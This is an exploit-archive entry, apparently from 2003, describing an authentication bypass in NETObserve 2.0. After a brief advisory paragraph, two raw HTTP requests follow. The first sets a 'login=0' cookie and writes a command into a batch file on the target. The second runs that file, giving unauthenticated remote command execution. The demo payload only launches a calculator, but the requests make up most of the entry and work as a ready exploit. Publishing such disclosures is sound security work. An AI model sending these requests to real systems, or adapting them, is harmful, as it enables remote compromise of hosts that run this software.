NETObserve 2.0 - Authentication Bypass

2003-12-29T00:00:00
ID EXPLOITPACK:9354B0027291BAFFA399371C5C3089F0
Type exploitpack
Reporter Peter Winter-Smith
Modified 2003-12-29T00:00:00

Description

NETObserve 2.0 - Authentication Bypass

                                        
                                            source: https://www.securityfocus.com/bid/9319/info

NETObserve is prone to a vulnerability that may permit remote unauthenticated users to access functions of the software. Due to the nature of the software, this could permit an attacker to execute commands remotely on an underlying system running the software. This may also expose privileged information about the system and its users. Successful exploitation will result in remote compromise of the system. 

REQUEST #1:

--------------------------------------------------------------------------
POST /sendeditfile HTTP/1.1
Accept: */*
Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
Content-Type: application/x-www-form-urlencoded
Host: AnyHostWillDo
Content-Length: 25
Cookie: login=0

newfiledata=cmd+%2Fc+calc
--------------------------------------------------------------------------

REQUEST #2:

--------------------------------------------------------------------------
GET /runfile=?C:\windows\win.bat? HTTP/1.1
Accept: */*
Host: AnyHostWillDo
Cookie: login=0


--------------------------------------------------------------------------